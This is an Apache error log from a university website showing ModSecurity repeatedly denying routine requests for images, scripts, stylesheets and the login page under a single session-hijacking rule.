[Mon Aug 28 08:47:19.367619 2023] [:error] [pid 38686] [client 36.72.192.185] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv8p8Co-f0AAJceGIYAAAAA"]
[Mon Aug 28 08:47:19.368461 2023] [:error] [pid 38114] [client 36.80.101.98] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv8p8Co-f0AAJTiogUAAAAE"]
[Mon Aug 28 08:47:19.812929 2023] [:error] [pid 38641] [client 118.99.106.74] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv8p8Co-f0AAJbxo9YAAAAJ"]
[Mon Aug 28 08:47:20.042803 2023] [:error] [pid 38648] [client 36.79.194.182] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv8qMCo-f0AAJb4sSEAAAAL"]
[Mon Aug 28 08:47:20.172612 2023] [:error] [pid 38303] [client 118.99.106.74] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv8qMCo-f0AAJWfaEsAAAAI"]
[Mon Aug 28 08:47:21.055527 2023] [:error] [pid 38648] [client 36.79.194.182] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv8qcCo-f0AAJb4sSIAAAAL"]
[Mon Aug 28 08:47:21.134923 2023] [:error] [pid 38686] [client 180.244.133.149] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv8qcCo-f0AAJceGIcAAAAA"]
[Mon Aug 28 08:47:21.134973 2023] [:error] [pid 38647] [client 36.80.101.98] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv8qcCo-f0AAJb3RVsAAAAH"]
[Mon Aug 28 08:47:21.135901 2023] [:error] [pid 38685] [client 36.80.101.98] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv8qcCo-f0AAJcdfHsAAAAR"]
[Mon Aug 28 08:47:21.140686 2023] [:error] [pid 38646] [client 36.72.192.185] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv8qcCo-f0AAJb21AcAAAAB"]
[Mon Aug 28 08:47:21.146092 2023] [:error] [pid 38643] [client 36.79.194.182] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv8qcCo-f0AAJbzcBwAAAAD"]
[Mon Aug 28 08:47:21.337404 2023] [:error] [pid 38686] [client 36.79.194.182] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv8qcCo-f0AAJceGIgAAAAA"]
[Mon Aug 28 08:47:21.429541 2023] [:error] [pid 38647] [client 36.79.194.182] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv8qcCo-f0AAJb3RVwAAAAH"]
[Mon Aug 28 08:47:21.488006 2023] [:error] [pid 38646] [client 36.80.101.98] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOv8qcCo-f0AAJb21AgAAAAB"]
[Mon Aug 28 08:47:21.488207 2023] [:error] [pid 38114] [client 36.80.101.98] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOv8qcCo-f0AAJTiogYAAAAE"]
[Mon Aug 28 08:47:21.490740 2023] [:error] [pid 38686] [client 36.80.101.98] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOv8qcCo-f0AAJceGIkAAAAA"]
[Mon Aug 28 08:47:21.493584 2023] [:error] [pid 38683] [client 36.79.194.182] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv8qcCo-f0AAJcb47YAAAAP"]
[Mon Aug 28 08:47:21.499386 2023] [:error] [pid 38643] [client 36.72.192.185] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOv8qcCo-f0AAJbzcB0AAAAD"]
[Mon Aug 28 08:47:21.538868 2023] [:error] [pid 38647] [client 36.72.192.185] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOv8qcCo-f0AAJb3RV0AAAAH"]
[Mon Aug 28 08:47:21.539715 2023] [:error] [pid 38303] [client 36.79.194.182] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOv8qcCo-f0AAJWfaEwAAAAI"]
[Mon Aug 28 08:47:21.558660 2023] [:error] [pid 38646] [client 180.244.133.149] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOv8qcCo-f0AAJb21AkAAAAB"]
[Mon Aug 28 08:47:21.570849 2023] [:error] [pid 38686] [client 36.79.194.182] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv8qcCo-f0AAJceGIoAAAAA"]
[Mon Aug 28 08:47:21.590887 2023] [:error] [pid 38647] [client 180.244.133.149] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOv8qcCo-f0AAJb3RV4AAAAH"]
[Mon Aug 28 08:47:21.610739 2023] [:error] [pid 38643] [client 36.79.194.182] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOv8qcCo-f0AAJbzcB4AAAAD"]
[Mon Aug 28 08:47:21.618576 2023] [:error] [pid 38646] [client 36.79.194.182] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOv8qcCo-f0AAJb21AoAAAAB"]
[Mon Aug 28 08:47:22.235583 2023] [:error] [pid 38303] [client 180.244.133.149] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv8qsCo-f0AAJWfaE0AAAAI"]
[Mon Aug 28 08:47:30.600587 2023] [:error] [pid 38303] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv8ssCo-f0AAJWfaE4AAAAI"]
[Mon Aug 28 08:47:32.153125 2023] [:error] [pid 38303] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv8tMCo-f0AAJWfaE8AAAAI"]
[Mon Aug 28 08:47:34.152421 2023] [:error] [pid 38647] [client 36.79.194.182] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv8tsCo-f0AAJb3RWAAAAAH"]
[Mon Aug 28 08:47:34.258549 2023] [:error] [pid 38686] [client 36.80.101.98] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv8tsCo-f0AAJceGI0AAAAA"]
[Mon Aug 28 08:47:38.882318 2023] [:error] [pid 38686] [client 180.244.133.149] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZOv8usCo-f0AAJceGI4AAAAA"]
[Mon Aug 28 08:47:38.959149 2023] [:error] [pid 38646] [client 36.80.101.98] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv8usCo-f0AAJb21A0AAAAB"]
[Mon Aug 28 08:48:19.351957 2023] [:error] [pid 38647] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv848Co-f0AAJb3RWcAAAAH"]
[Mon Aug 28 08:48:19.373207 2023] [:error] [pid 38685] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv848Co-f0AAJcdfIAAAAAR"]
[Mon Aug 28 08:48:19.373304 2023] [:error] [pid 38644] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv848Co-f0AAJb0F9EAAAAK"]
[Mon Aug 28 08:48:19.541545 2023] [:error] [pid 38685] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv848Co-f0AAJcdfIEAAAAR"]
[Mon Aug 28 08:48:19.542608 2023] [:error] [pid 38114] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv848Co-f0AAJTiogwAAAAE"]
[Mon Aug 28 08:48:19.647695 2023] [:error] [pid 38389] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv848Co-f0AAJX1lioAAAAS"]
[Mon Aug 28 08:48:19.739389 2023] [:error] [pid 38644] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv848Co-f0AAJb0F9IAAAAK"]
[Mon Aug 28 08:48:21.134494 2023] [:error] [pid 38646] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv85cCo-f0AAJb21BUAAAAB"]
[Mon Aug 28 08:48:22.542118 2023] [:error] [pid 38686] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv85sCo-f0AAJceGJQAAAAA"]
[Mon Aug 28 08:48:22.691188 2023] [:error] [pid 38114] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv85sCo-f0AAJTiog0AAAAE"]
[Mon Aug 28 08:48:25.032497 2023] [:error] [pid 38686] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/index.php/web/content/prosedurpmb/"] [unique_id "ZOv86cCo-f0AAJceGJUAAAAA"]
[Mon Aug 28 08:48:25.104869 2023] [:error] [pid 38644] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv86cCo-f0AAJb0F9QAAAAK"]
[Mon Aug 28 08:48:31.030096 2023] [:error] [pid 38683] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOv878Co-f0AAJcb470AAAAP"]
[Mon Aug 28 08:48:32.842682 2023] [:error] [pid 38646] [client 180.244.133.183] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/periksausm"] [unique_id "ZOv88MCo-f0AAJb21BoAAAAB"]
[Mon Aug 28 08:48:32.844274 2023] [:error] [pid 38686] [client 180.244.133.183] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv88MCo-f0AAJceGJYAAAAA"]
[Mon Aug 28 08:48:33.495009 2023] [:error] [pid 38646] [client 180.244.133.183] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv88cCo-f0AAJb21BsAAAAB"]
[Mon Aug 28 08:48:51.810364 2023] [:error] [pid 38114] [client 180.245.127.109] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOv9A8Co-f0AAJTiohMAAAAE"]
[Mon Aug 28 08:48:51.813399 2023] [:error] [pid 38644] [client 180.245.127.109] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOv9A8Co-f0AAJb0F9cAAAAK"]
[Mon Aug 28 08:48:51.828371 2023] [:error] [pid 38389] [client 180.245.127.109] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOv9A8Co-f0AAJX1ljEAAAAS"]
[Mon Aug 28 08:48:52.289706 2023] [:error] [pid 38646] [client 180.245.127.109] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOv9BMCo-f0AAJb21B4AAAAB"]
[Mon Aug 28 08:48:56.099887 2023] [:error] [pid 38648] [client 180.245.127.109] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv9CMCo-f0AAJb4sUEAAAAL"]
[Mon Aug 28 08:48:56.468817 2023] [:error] [pid 38646] [client 180.245.127.109] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv9CMCo-f0AAJb21B8AAAAB"]
[Mon Aug 28 08:48:59.051361 2023] [:error] [pid 38303] [client 180.245.127.109] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv9C8Co-f0AAJWfaFoAAAAI"]
[Mon Aug 28 08:48:59.257570 2023] [:error] [pid 38646] [client 180.245.127.109] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv9C8Co-f0AAJb21CAAAAAB"]
[Mon Aug 28 08:49:01.169486 2023] [:error] [pid 38683] [client 180.245.127.109] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOv9DcCo-f0AAJcb48AAAAAP"]
[Mon Aug 28 08:49:01.398414 2023] [:error] [pid 38114] [client 180.245.127.109] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv9DcCo-f0AAJTiohQAAAAE"]
[Mon Aug 28 08:49:03.414367 2023] [:error] [pid 38646] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv9D8Co-f0AAJb21CEAAAAB"]
[Mon Aug 28 08:49:12.902554 2023] [:error] [pid 38646] [client 180.245.127.109] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOv9GMCo-f0AAJb21CIAAAAB"]
[Mon Aug 28 08:49:13.843250 2023] [:error] [pid 38389] [client 180.245.127.109] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv9GcCo-f0AAJX1ljMAAAAS"]
[Mon Aug 28 08:49:50.779591 2023] [:error] [pid 38683] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/c_mastah/grid_vstsemester"] [unique_id "ZOv9PsCo-f0AAJcb48UAAAAP"]
[Mon Aug 28 08:49:52.255627 2023] [:error] [pid 38389] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv9QMCo-f0AAJX1ljcAAAAS"]
[Mon Aug 28 08:49:52.299723 2023] [:error] [pid 38686] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv9QMCo-f0AAJceGKIAAAAA"]
